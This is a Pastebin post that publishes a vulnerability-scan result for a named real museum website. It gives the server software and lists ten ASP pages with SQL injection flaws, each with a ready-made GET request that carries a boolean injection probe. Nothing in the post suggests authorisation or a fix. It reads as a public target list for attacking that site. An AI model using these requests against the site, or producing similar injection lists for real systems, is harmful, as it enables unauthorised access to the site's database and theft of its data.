Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Target: http://www.museoscienza.org/
- Server banner Microsoft-IIS/6.0
- Operating system Windows Web server IIS 6.0
- Technologies ASP.NET
- ========================================================================
- SQL injection
- Affected items
- /audio/audio.asp
- /dipartimenti/catalogo_collezioni/scheda_oggetto.asp
- /gallery/gallery.asp
- /leonardo/modelli/macchina-leo.asp
- /museoingiro/dettaglio.asp
- /myTest/vis_test.asp
- /news/dettaglio.asp
- /scuole/archivio_crei.asp
- /scuole/proposta_dett.asp
- /video/video.asp
- ex.:
- GET /audio/audio.asp?audio=42+and+31337-31337=0
- GET /dipartimenti/catalogo_collezioni/scheda_oggetto.asp?idk_in=ST060-00001'+and+31337-31337='0&arg=Astronomia
- GET /gallery/gallery.asp?gallery=139+and+31337-31337=0
- GET /leonardo/modelli/macchina-leo.asp?id_macchina=11+and+31337-31337=0
- GET /museoingiro/dettaglio.asp?id_mig=49+and+31337-31337=0&archivio=no
- GET /myTest/vis_test.asp?q=30+and+31337-31337=0
- GET /news/dettaglio.asp?idnotizia=549+and+31337-31337=0
- GET /scuole/archivio_crei.asp?provenienza=3+and+31337-31337=0
- GET /scuole/proposta_dett.asp?proposta=2&dip=9&sez=44+and+31337-31337=0&num=7
- GET /scuole/proposta_dett.asp?proposta=2&dip=9+and+31337-31337=0&sez=44
- GET /video/video.asp?video=64+and+31337-31337=0&cat=LEONARDO
Add Comment
Please, Sign In to add comment